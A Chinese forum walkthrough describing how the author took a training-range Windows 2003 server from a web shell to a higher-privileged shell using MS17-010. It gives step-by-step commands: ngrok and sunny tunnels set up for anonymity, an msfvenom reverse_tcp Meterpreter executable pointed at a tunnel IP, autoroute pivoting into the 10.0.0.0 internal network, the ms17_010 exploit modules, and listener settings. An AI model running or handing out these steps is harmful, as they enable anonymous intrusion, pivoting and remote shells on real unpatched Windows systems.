Ms17-010进行WEB提权之实践下某培训靶机服务器
前言:该机器为某个其他培训机构的靶机,说实话在这里没炫耀啥,只是给各位学习Ms17010的同学指一条路,我原先也折腾这玩意儿好久,但是就是不行,最近才找到了出路,所以多写两篇文章,把各种需要注意的地方,一步,一步写清楚,文章如果看不懂?那写出来的意义何在?
ngrok与sunny都是匿名的好东西,此次攻击全程在kali下面完成,无需公网,并且使用的代理转发,都是一次性,So?下面开始
准备工作
1.Kali一台
2.ngrok账户注册:https://dashboard.ngrok.com/user/signup
3.sunny账户注册:https://www.ngrok.cc/
开始操作
1.开启Kali并且运行Msf
2.注册账户https://dashboard.ngrok.com/user/signup(用谷歌账户,或者git账户登陆就行了。)
下载:https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip
然后解压得到:
接着。
红色圈中填写就是
填写好了之后,回车,自动生成了一个 yml 的配置文件。
接着开始转发:
[HTML] [color=rgb(51, 102, 153) !important]纯文本查看[color=rgb(51, 102, 153) !important]复制代码
[backcolor=white !important][color=white !important][color=white !important]?
得到了之后我们继续下一个 sunny的。
(PS:这里解释一下,我们目前需要两个端口转发工具的原因就是因为ngrok不支持同时转发两个,因为要 付费 付费 付费。所以我们需要sunny来弄,但是也需要10块钱!!!!)
然后 sunny的用法。
1.购买
2.结果
设置
本地转发地址:127.0.0.1
本地转发端口:4444
3.下载
http://hls.ctopus.com/sunny/linux_amd64.zip
一般都安装的 Kali 64位吧?就上面那个下载
解压后得到
4.运行
./sunny cilentid 隧道ID(就上图黑色部分那个)
5.结果
开始正式渗透:
当前进程:
转发内网6666端口到外网
转发内网4444端口到外网
正式工作
ping ngrok的IP
得到了这个IP:52.14.61.47(记得,不要关闭了ngrok,一旦关闭IP和端口又会改变。匿名性较高。)
端口,下面要填写的
然后msf生成木马
msfVENOM-p windows/meterpreter/reverse_tcp LHOST=填写ngrok的IP地址就上面的 LPORT=这里填写ngrok后面的端口 -f exe > /var/www/html/4444.exe
完成之后的格式
msfvenom -p windows/meterpreter/reverse_tcp LHOST=52.14.61.47 LPORT=15838 -f exe > /var/www/html/4444.exe
shell端上传运行4444.exe
结果图
得到了shell之后,我们看一下当前权限
NT AUTHORITY\NETWORK SERVICE(User权限)
现在跟着下面步骤走:
第一步:run get_local_subnets(获取当前的路由)
Local subnet: 10.0.0.0/255.0.0.0
Local subnet: 169.254.0.0/255.255.0.0
第二步:run autoroute -s 10.0.0.0 -n 255.0.0.0(添加路由地址)
第三步:run autoroute -p(查看是否添加成功)
第四步:
background(置当前sessions到后台,我们去调用payload)
use exploit/windows/smb/ms17_010_p**ec(因为这台服务器是 Windows 2003所以要用这个,如果是2008和win7,则用下面)
use exploit/windows/smb/ms17_010_eternalblue(适用 Windows 2008 Windows 7)
第五步:sessions l 然后 sessions 3(刚才background到了后台的shell用sessions重新调出来)
第六步:ipconfig(查看当前服务器的内网IP)
然后:ctrl+c 输入 Y 退出shell模式。
再输入:background 调到后台
第七步:set rhost 内网IP(设置要攻击的IP地址)
第八步:这回要用到sunny。(按照上面的ngrok一样,ping出IP地址,然后得到后面的端口)
接着回到咋们的msf
set payload windows/meterpreter/reverse_tcp
set lhost ping出来的IP(这里填写的不是ngrok的,是sunny的ping出来的IP地址)
set lport sunny的外网端口
最终结果
第九步:新开一个msf窗口,(用来接返回的shell)
lhost本地IP:127.0.0.1
监听端口:6666
第十步:回到刚才msf窗口,。
执行:exploit(开始攻击)
可以看到,攻击机这边提示没有获取到session,但是我们的另外一个msf缺接收到了shell
有问题大家可以留言哦,也欢迎大家到春秋论坛中来耍一耍>>>点击跳转